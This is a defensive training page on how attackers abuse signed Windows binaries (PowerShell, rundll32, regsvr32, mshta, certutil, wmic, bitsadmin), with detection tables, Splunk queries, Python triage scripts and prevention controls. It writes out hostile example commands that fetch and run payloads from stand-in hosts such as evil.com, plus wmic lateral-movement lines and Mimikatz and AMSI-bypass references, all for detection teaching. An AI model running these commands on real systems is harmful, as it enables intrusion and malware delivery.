Living-off-the-Land Binaries (T1218)
How attackers abuse signed Microsoft binaries to evade detection: the LOLBins every SOC analyst must recognize, and the command-line patterns that reveal their malicious use.
What LOLBins Are and Why Attackers Love Them
- LOLBins (Living-off-the-Land Binaries) are trusted, Microsoft-signed executables that attackers misuse to evade detection and application allowlisting.
- MITRE ATT&CK maps much of this abuse to T1218 (System Binary Proxy Execution), whose sub-techniques cover regsvr32.exe, mshta.exe, rundll32.exe, cmstp.exe and several more. Other LOLBins sit under different techniques: certutil.exe under T1105 (Ingress Tool Transfer) and T1140 (Deobfuscate/Decode Files or Information), bitsadmin.exe under T1197 (BITS Jobs), wmic.exe under T1047 (Windows Management Instrumentation).
- Because these binaries are Microsoft-signed and needed by Windows itself, allowlisting policies that trust Microsoft-signed code permit them by default, and they are present on every Windows host, on-prem or cloud-hosted.
- Attackers exploit this trust: instead of dropping custom malware that might get flagged, they use tools already on the system.
The LOLBins Every Analyst Must Recognize
PowerShell (T1059.001) — The Swiss Army Knife
PowerShell is the most abused LOLBin. It can download payloads, execute code, access the Windows API, and run scripts entirely in memory.
Suspicious command-line patterns:
| Pattern | What It Does | Detection |
|---|---|---|
| `powershell -EncodedCommand <base64>` | Executes a base64-encoded (UTF-16LE) script, hiding the actual command | Event 4688 command line with `-EncodedCommand` or any abbreviation PowerShell accepts (`-e`, `-ec`, `-enc`); decode before judging |
| `powershell -c <inline command>` | Runs an inline command without a script file | Suspicious if the parent process is an Office application, browser or email client |
| `powershell IEX (New-Object Net.WebClient).DownloadString('http://...')` | Downloads and executes a remote payload without writing it to disk | Event 4688 command line with `DownloadString`, `WebClient`, `IEX` or `Invoke-Expression` |
| `powershell -NoProfile -WindowStyle Hidden` | Runs silently with no console window | Hidden window plus `-NoProfile` is normal for some scheduled tasks, but suspicious when the parent is a user-interactive process |
| `powershell -Command "Invoke-Mimikatz"` | Loads Mimikatz in memory | Event 4688 only if the function name is on the command line; PowerShell Script Block Logging (Event 4104) catches it when it is loaded from a downloaded script |
SPL query — detect suspicious PowerShell (also applicable to credential dumping scenarios). Splunk's like() is case-sensitive, so the command line is lower-cased first, and the abbreviated switches are matched as well as the full names:

```spl
index=windows sourcetype="WinEventLog:Security" EventCode=4688
| search NewProcessName="*powershell.exe"
| eval cmd=lower(CommandLine)
| where like(cmd, "%-encodedcommand%") OR like(cmd, "% -e %") OR like(cmd, "% -enc %") OR like(cmd, "% -ec %") OR like(cmd, "%iex%") OR like(cmd, "%downloadstring%") OR like(cmd, "%-windowstyle hidden%") OR like(cmd, "% -w hidden%")
| stats values(CommandLine) as CommandLines by ParentProcessName, SubjectUserName, ComputerName
| eval alert = "HIGH — suspicious PowerShell: " . ParentProcessName . " spawned powershell.exe"
```
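The query above matches on the raw command line, which an encoded payload defeats; the analyst still has to decode it. The following Python is an added example, not code from the original page or from any vendor tool. It resolves PowerShell's abbreviated switches (`-e`, `-ec`, `-w`, `-nop` and the like, which fixed-string matching misses), decodes the UTF-16LE base64 behind `-EncodedCommand`, and collects indicators from the decoded script. The sample command lines, the `C:\Scripts` path and the 192.0.2.10 address are constructed; the shortest-prefix table reflects how powershell.exe parses its switches.

```python
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional

# powershell.exe accepts any unambiguous prefix of a switch, down to the shortest
# form listed here (-e, -c, -nop, -w, ...), plus the explicit alias -ec.
SWITCHES = {"encodedcommand": "e", "command": "c", "noprofile": "nop",
            "windowstyle": "w", "noninteractive": "noni", "executionpolicy": "ex"}
ALIASES = {"ec": "encodedcommand"}

# Indicators checked against the decoded script (or the raw command line if none).
SCRIPT_INDICATORS = [
    ("download cradle", re.compile(r"downloadstring|downloadfile|downloaddata|net\.webclient|"
                                   r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b", re.I)),
    ("invoke-expression", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("nested base64", re.compile(r"frombase64string", re.I)),
    ("url", re.compile(r"https?://", re.I)),
    ("mimikatz", re.compile(r"invoke-mimikatz|sekurlsa", re.I)),
    ("amsi tamper", re.compile(r"amsiutils|amsiinitfailed|amsiscanbuffer", re.I)),
]

@dataclass
class Triage:
    command_line: str
    decoded: Optional[str] = None          # script recovered from -EncodedCommand, if any
    indicators: List[str] = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.indicators)

def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping double-quoted runs together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def switch_name(token: str) -> Optional[str]:
    """Resolve -e / /enc / -EncodedCommand etc. to the full switch name, or None."""
    if len(token) < 2 or token[0] not in "-/":
        return None
    frag = token[1:].lower()
    if frag in ALIASES:
        return ALIASES[frag]
    for full, shortest in SWITCHES.items():
        if full.startswith(frag) and frag.startswith(shortest):
            return full
    return None

def encode_command(script: str) -> str:
    """Build an -EncodedCommand argument: base64 over the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(b64: str) -> Optional[str]:
    """Reverse of encode_command; None if the argument is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None

def triage(cmdline: str) -> Triage:
    result = Triage(cmdline)
    tokens = tokenize(cmdline)
    script_parts: List[str] = []
    i = 0
    while i < len(tokens):
        name = switch_name(tokens[i])
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if name == "encodedcommand" and nxt:
            result.indicators.append("encoded command")
            result.decoded = decode_encoded_command(nxt)
            if result.decoded is not None:
                script_parts.append(result.decoded)
            i += 2
        elif name == "command" and nxt:
            script_parts.append(" ".join(tokens[i + 1:]))  # everything after -Command is script
            break
        elif name == "windowstyle" and nxt.lower() == "hidden":
            result.indicators.append("hidden window")
            i += 2
        elif name == "executionpolicy" and nxt.lower() == "bypass":
            result.indicators.append("execution policy bypass")
            i += 2
        else:
            if name == "noprofile":
                result.indicators.append("no profile")
            i += 1
    haystack = " ".join(script_parts) or cmdline
    for label, pattern in SCRIPT_INDICATORS:
        if pattern.search(haystack):
            result.indicators.append(label)
    return result

# Constructed sample command lines (not taken from any real incident).
SAMPLE_COMMAND_LINES = [
    "powershell.exe -nop -w hidden -e " + encode_command(
        "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"),
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1",
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "Get-Service -Name Spooler"',
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        t = triage(line)
        print(f"score={t.score} indicators={t.indicators}")
        if t.decoded:
            print("   decoded:", t.decoded)
```

The first sample scores on six indicators once decoded, while the two administrative-looking lines score one each; in practice the score feeds a triage queue, and the decoded script is what an analyst (or Script Block Logging) needs to read.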
Rundll32 (T1218.011) — The DLL Runner
rundll32.exe loads a DLL and calls one of its exported functions. Attackers use it to run attacker-supplied DLLs and, by way of mshtml.dll, inline JavaScript.
Suspicious patterns:
- `rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";...` — JavaScript execution via rundll32, proxied through mshtml.dll
- `rundll32.exe <malicious.dll>,<export>` — loading an attacker-supplied DLL and calling one of its exports
- `rundll32.exe zipfldr.dll,RouteTheCall <program>` — launching an arbitrary program through the ZIP folder shell extension
Regsvr32 (T1218.010) — The COM Registrar
regsvr32.exe registers COM components. Attackers use it to execute scripts hosted remotely.
Suspicious command:

```
regsvr32.exe /s /n /u /i:http://evil.com/payload.sct scrobj.dll
```

This loads a COM scriptlet from a remote URL using the legitimate scrobj.dll and executes it in memory: no payload is dropped, and the only on-disk trace may be a cached copy of the .sct in the user's INetCache.
Mshta (T1218.005) — The HTA Runner
mshta.exe executes Microsoft HTML Applications (.hta files). Attackers use it to run JavaScript/VBScript outside the browser sandbox.
Suspicious patterns:
- `mshta.exe http://evil.com/payload.hta` — remote .hta execution
- `mshta.exe javascript:"<script>...</script>"` — inline script execution (`vbscript:` URIs work the same way)
- `mshta.exe "C:\Users\Public\malicious.hta"` — .hta in a non-standard location
Certutil (T1105 / T1140 — not a T1218 sub-technique)
certutil.exe is a built-in certificate utility. Attackers abuse its download and decode functionality.
Suspicious patterns:
- `certutil -urlcache -split -f http://evil.com/payload.exe` — downloads a file from a URL, saving it under the URL's last path component in the current directory and in the user's URL cache
- `certutil -decode encoded.txt output.exe` — decodes a base64-encoded executable (`-encode` is the matching staging step)
- `certutil -ping <host>` — contacts a certificate authority's request interface; outside PKI administration it is an unusual connectivity probe toward a chosen host
Wmic (T1047) — The WMI Executioner
wmic.exe provides WMI access from the command line. Attackers use it for process creation, lateral movement, and task execution. It is deprecated, and recent Windows 11 builds ship it only as an optional feature, so its execution on a current host is itself worth a look.
Suspicious patterns:
- `wmic process call create "powershell.exe -EncodedCommand..."` — creates a new process via WMI (the child appears under WmiPrvSE.exe, not wmic.exe)
- `wmic /node:TARGET_SERVER process call create "cmd.exe /c ..."` — lateral movement: the process is created on the remote host
- `wmic /node:TARGET_SERVER /user:DOMAIN\attacker /password:... process call create ...` — the same with explicit credentials, typical after credential theft
Cscript / Wscript (T1059.005) — Script Hosts
cscript.exe and wscript.exe run VBScript and JScript. Dropped script files in non-standard locations are suspicious.
Suspicious patterns:
- `.vbs` or `.js` files in `%TEMP%`, `%APPDATA%` or the user's Downloads folder
- Scripts making network connections (`WinHttp.WinHttpRequest.5.1`, `MSXML2.ServerXMLHTTP`, `MSXML2.XMLHTTP`)
- Scripts running from non-standard parent processes (email client, browser)
BITSAdmin (T1197) — Background Downloader
bitsadmin.exe downloads files via the Background Intelligent Transfer Service (BITS). Jobs persist across reboots and network interruptions, and the transfer is performed by the BITS service inside svchost.exe, so the network connection is attributed to svchost.exe rather than to bitsadmin.exe.
Suspicious patterns:
- `bitsadmin /transfer job /download /priority high http://evil.com/payload.exe C:\Users\Public\payload.exe` — one-shot download
- `bitsadmin /create job`, then `bitsadmin /addfile job http://evil.com/stage2.ps1 C:\temp\stage2.ps1`, `bitsadmin /SetNotifyCmdLine job <program> [args]` and `bitsadmin /resume job` — staged download that runs a command when the transfer completes
- BITS jobs created by non-admin users
Detection — Finding LOLBin Abuse
The Parent-Process Analysis Pattern
The most effective detection technique for LOLBin abuse is parent-child process analysis. The same program run from different parent processes means different things:
| LOLBin | Normal Parent | Suspicious Parent | Suspicious Child / Follow-on |
|---|---|---|---|
| powershell.exe | explorer.exe (user runs a script), svchost.exe (Task Scheduler; taskeng.exe on Windows 7/8) | winword.exe, excel.exe, outlook.exe, chrome.exe, firefox.exe | Discovery tools (net.exe, nslookup.exe, whoami.exe) and any outbound network connection |
| rundll32.exe | svchost.exe, explorer.exe | powershell.exe, winword.exe, wscript.exe | powershell.exe, cmd.exe |
| regsvr32.exe | msiexec.exe and software installers (COM registration) | wscript.exe, explorer.exe (launched from a user directory) | DNS queries to uncommon domains |
| mshta.exe | Rarely run legitimately anymore | Any user-interactive process | powershell.exe, cmd.exe, network connections |
| certutil.exe | System processes (certificate operations) | cmd.exe, powershell.exe | Network connections (download) |
| wmic.exe | svchost.exe (admin tasks) | powershell.exe, explorer.exe (non-admin user) | WmiPrvSE.exe spawning cmd.exe or powershell.exe on the remote host — the hallmark of WMI lateral movement |
SPL query — detect suspicious LOLBin parent process:
```spl
index=windows sourcetype="WinEventLog:Security" EventCode=4688
| search NewProcessName IN ("*powershell.exe", "*rundll32.exe", "*regsvr32.exe", "*mshta.exe", "*certutil.exe", "*wmic.exe", "*cscript.exe", "*wscript.exe", "*bitsadmin.exe")
| search ParentProcessName IN ("*winword.exe", "*excel.exe", "*outlook.exe", "*powerpnt.exe", "*chrome.exe", "*firefox.exe", "*msedge.exe")
| eval alert = "CRITICAL — LOLBin abuse: " . ParentProcessName . " spawned " . NewProcessName
| table _time, ComputerName, SubjectUserName, ParentProcessName, NewProcessName, CommandLine, alert
```
Command-Line Analysis
Focus on these signal-rich patterns in command lines:
- URLs in command lines — any LOLBin with an HTTP/HTTPS URL is suspicious (except certutil, which legitimately fetches CRLs and AIA certificates)
- Base64 strings — `-EncodedCommand`, or long base64 in `/i:` parameters
- Multiple flags — legitimate use of LOLBins tends to use 1-2 flags, while attackers stack 4+ (e.g. `regsvr32 /s /n /u /i:`)
- Unusual file extensions — `.ps1`, `.vbs`, `.hta`, `.dll`, `.exe` files in `%TEMP%` or `%APPDATA%`
Network Connection Correlation
When a LOLBin executes and immediately makes a network connection, that is the strongest single signal. Correlate Sysmon process creation (Event 1) with network connection events (Sysmon Event 3) on ProcessGuid: Event 3 carries the image path but neither the command line nor the parent, so the join is what supplies them. Security Event 4688 has no ProcessGuid, only a reusable PID, which makes it a poor join key. Note that Sysmon logs network connections only when configured to (the `-n` switch or a NetworkConnect rule); they are off by default.
SPL query — detect LOLBin with a network connection shortly after creation:

```spl
index=windows sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" (EventCode=1 OR EventCode=3)
| search Image IN ("*powershell.exe", "*rundll32.exe", "*regsvr32.exe", "*mshta.exe", "*certutil.exe", "*wmic.exe")
| stats values(CommandLine) as CommandLine, values(ParentImage) as ParentImage, values(DestinationIp) as DestIPs, values(DestinationPort) as DestPorts, values(DestinationHostname) as DestHosts, dc(DestinationIp) as DestCount, min(eval(if(EventCode=1, _time, null()))) as created, min(eval(if(EventCode=3, _time, null()))) as first_conn by Computer, Image, ProcessGuid
| where DestCount > 0 AND (isnull(created) OR first_conn - created < 60)
| eval alert = "HIGH — " . Image . " on " . Computer . " making network connections to " . DestCount . " IPs"
| table Computer, ParentImage, Image, CommandLine, DestIPs, DestPorts, DestHosts, alert
```

Rows with a null `created` are connections from a process whose Event 1 was never seen (it started before Sysmon, or the event was lost); they are kept on purpose rather than silently dropped.
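To make the parent-process table and the Sysmon correlation concrete, here is an added Python example, not code from the original page or from Splunk or Sysmon. It joins constructed Sysmon Event 1 and Event 3 records on ProcessGuid, applies the expected-parent and suspicious-parent rules from the table above, and scores each LOLBin process. The event records, the host name WS01, the process GUIDs and the 192.0.2.x / 198.51.100.x addresses are constructed test data, and the severity weights are an illustrative choice. It also handles two cases the SPL alone does not make obvious: a BITS download whose connection is attributed to svchost.exe rather than bitsadmin.exe, and an Event 3 with no matching Event 1.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List

LOLBINS = {"powershell.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe", "certutil.exe",
           "wmic.exe", "cscript.exe", "wscript.exe", "bitsadmin.exe"}
# Parents an analyst expects per LOLBin (svchost.exe covers the Task Scheduler and
# other services); a parent not listed here counts as "unexpected".
EXPECTED_PARENTS = {
    "powershell.exe": {"explorer.exe", "svchost.exe"},
    "rundll32.exe": {"svchost.exe", "explorer.exe"},
    "regsvr32.exe": {"msiexec.exe", "svchost.exe"},
    "certutil.exe": {"services.exe", "svchost.exe"},
    "wmic.exe": {"svchost.exe"},
}
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "chrome.exe", "firefox.exe", "msedge.exe"}
URL_RE = re.compile(r"https?://", re.I)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

@dataclass
class Finding:
    process_guid: str
    computer: str
    image: str
    parent: str
    command_line: str
    destinations: List[str] = field(default_factory=list)
    reasons: List[str] = field(default_factory=list)
    score: int = 0

    def add(self, weight: int, reason: str) -> None:
        self.score += weight
        self.reasons.append(reason)

    @property
    def severity(self) -> str:  # illustrative thresholds
        return "CRITICAL" if self.score >= 4 else "HIGH" if self.score >= 2 else "LOW"

def correlate(events: List[Dict]) -> List[Finding]:
    """Join Event 1 (create) and Event 3 (connect) on ProcessGuid; score LOLBin processes."""
    creates = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    connects: Dict[str, List[Dict]] = defaultdict(list)
    for e in events:
        if e["EventID"] == 3:
            connects[e["ProcessGuid"]].append(e)
    findings = []
    for guid, e in creates.items():
        image, parent = basename(e["Image"]), basename(e["ParentImage"])
        if image not in LOLBINS:
            continue
        dests = [f'{c["DestinationIp"]}:{c["DestinationPort"]}' for c in connects.get(guid, [])]
        f = Finding(guid, e["Computer"], image, parent, e["CommandLine"], dests)
        if parent in SUSPICIOUS_PARENTS:
            f.add(2, f"spawned by {parent} (Office/browser/mail client)")
        elif parent not in EXPECTED_PARENTS.get(image, set()):
            f.add(1, f"unexpected parent {parent}")
        if dests:
            f.add(2, f"{len(dests)} outbound connection(s) from the LOLBin itself")
        if URL_RE.search(e["CommandLine"]):
            f.add(1, "URL in command line")
        if f.score:
            findings.append(f)
    # Event 3 with no Event 1 (process predates Sysmon, or the create event was lost):
    # still worth a look when the connecting image is a LOLBin.
    for guid, conns in connects.items():
        if guid in creates or basename(conns[0]["Image"]) not in LOLBINS:
            continue
        dests = [f'{c["DestinationIp"]}:{c["DestinationPort"]}' for c in conns]
        f = Finding(guid, conns[0]["Computer"], basename(conns[0]["Image"]), "(no Event 1 seen)", "", dests)
        f.add(2, "network connection without an observed process creation")
        findings.append(f)
    return findings

def _create(guid, image, parent, cmd):  # constructed Sysmon Event 1 record
    return {"EventID": 1, "Computer": "WS01", "ProcessGuid": guid, "Image": image,
            "ParentImage": parent, "CommandLine": cmd}

def _connect(guid, image, ip, port):  # constructed Sysmon Event 3 record
    return {"EventID": 3, "Computer": "WS01", "ProcessGuid": guid, "Image": image,
            "DestinationIp": ip, "DestinationPort": port}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
S32 = r"C:\Windows\System32"
SAMPLE_EVENTS = [  # constructed test data, not from a real incident
    _create("{A}", PS, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
            "powershell.exe -nop -w hidden -enc <base64>"),
    _connect("{A}", PS, "192.0.2.10", 443),
    _create("{B}", PS, r"C:\Windows\explorer.exe", r"powershell.exe -File C:\Scripts\inventory.ps1"),
    _create("{C}", S32 + r"\certutil.exe", S32 + r"\cmd.exe",
            "certutil -urlcache -split -f http://192.0.2.10/tool.exe tool.exe"),
    _connect("{C}", S32 + r"\certutil.exe", "192.0.2.10", 80),
    # The BITS service (svchost.exe) performs the transfer, so no Event 3 is attributed to bitsadmin.exe.
    _create("{D}", S32 + r"\bitsadmin.exe", S32 + r"\cmd.exe",
            r"bitsadmin /transfer job /download /priority high http://192.0.2.10/s2.ps1 C:\Users\Public\s2.ps1"),
    _connect("{E}", r"C:\Program Files\Google\Chrome\Application\chrome.exe", "198.51.100.5", 443),
    _connect("{F}", S32 + r"\mshta.exe", "192.0.2.10", 8080),  # no Event 1 for this process
]

if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print(f"{f.severity:8} {f.computer} {f.parent} -> {f.image} {f.destinations} {f.reasons}")
```

The Word-spawned PowerShell and the certutil download both come out CRITICAL, the bitsadmin line is HIGH on parent and URL alone because its transfer never shows up as a connection from bitsadmin.exe, the explorer-launched script is dropped, and the orphan mshta.exe connection is surfaced rather than lost in the join.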
Prevention
| Control | What It Prevents | Implementation |
|---|---|---|
| AppLocker / WDAC | Blocks non-approved executables and, with explicit deny rules, the LOLBins the organization does not need | Allow only Microsoft-signed and organization-signed binaries, then add Microsoft's recommended block rules (which deny mshta.exe, wmic.exe, cscript.exe, wscript.exe and others); a pure signer-based allowlist misses LOLBins precisely because they are Microsoft-signed |
| ASR Rules | Blocks specific LOLBin abuse patterns | Block Office applications from creating child processes; Block JavaScript or VBScript from launching downloaded executable content; Block process creations originating from PSExec and WMI commands |
| Constrained Language Mode (PowerShell) | Prevents PowerShell-based LOLBin abuse (no arbitrary .NET method calls, no Add-Type, no COM objects) | Enforce via WDAC or AppLocker script rules; the __PSLockdownPolicy environment variable also enables CLM but is not a security boundary, since any user can unset it |
| AMSI | Lets the AV engine scan script content at run time, including decoded -EncodedCommand payloads and in-memory downloads | Keep an AMSI-integrated engine enabled; bypasses exist, but the common ones (patching amsi.dll in memory, flipping amsiInitFailed) are themselves detectable |
| Event ID 4688 with command-line logging | Provides visibility into LOLBin usage | Enable Audit Process Creation and "Include command line in process creation events" in Group Policy; pair with PowerShell Script Block Logging (Event 4104) to see the decoded script |
| Sysmon Event 1 with command-line logging | More detailed process creation telemetry (ProcessGuid, parent command line, hashes) | Configure Sysmon to capture all process creation with command lines, and enable network connection logging (Event 3) so the two can be joined |
Related
- Cobalt Strike — Detection and Beacon Analysis — detection and response for T1055, T1572, T1071 techniques
- EDR Basics — detection and response for T1059, T1003, T1055, T1204, T1562 techniques
- Sigma Rules — detection and response for T1059, T1110 techniques
- Process Injection (T1055) — detection and response for T1055 techniques
